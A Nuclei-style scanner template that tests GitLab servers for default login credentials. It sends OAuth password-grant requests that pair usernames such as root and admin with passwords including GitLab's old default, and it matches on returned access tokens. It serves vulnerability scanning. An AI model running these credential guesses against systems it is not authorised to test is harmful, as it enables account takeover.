59 lines
1.3 KiB
YAML
59 lines
1.3 KiB
YAML
id: gitlab-weak-login
|
|
|
|
info:
|
|
name: Gitlab Default Login
|
|
author: Suman_Kar,dwisiswant0
|
|
severity: high
|
|
description: Gitlab default login credentials were discovered.
|
|
tags: gitlab,default-login
|
|
reference:
|
|
- https://twitter.com/0xmahmoudJo0/status/1467394090685943809
|
|
- https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab
|
|
metadata:
|
|
shodan-query: http.title:"GitLab"
|
|
classification:
|
|
cwe-id: CWE-798
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /oauth/token HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: application/json, text/plain, */*
|
|
Referer: {{BaseURL}}
|
|
content-type: application/json
|
|
|
|
{"grant_type":"password","username":"{{username}}","password":"{{password}}"}
|
|
|
|
attack: clusterbomb
|
|
payloads:
|
|
username:
|
|
- "root"
|
|
- "admin"
|
|
- "admin@local.host"
|
|
|
|
password:
|
|
- "5iveL!fe"
|
|
- "123456789"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- application/json
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"access_token":'
|
|
- '"token_type":'
|
|
- '"refresh_token":'
|
|
condition: and
|
|
|
|
# Enhanced by mp on 2022/03/03
|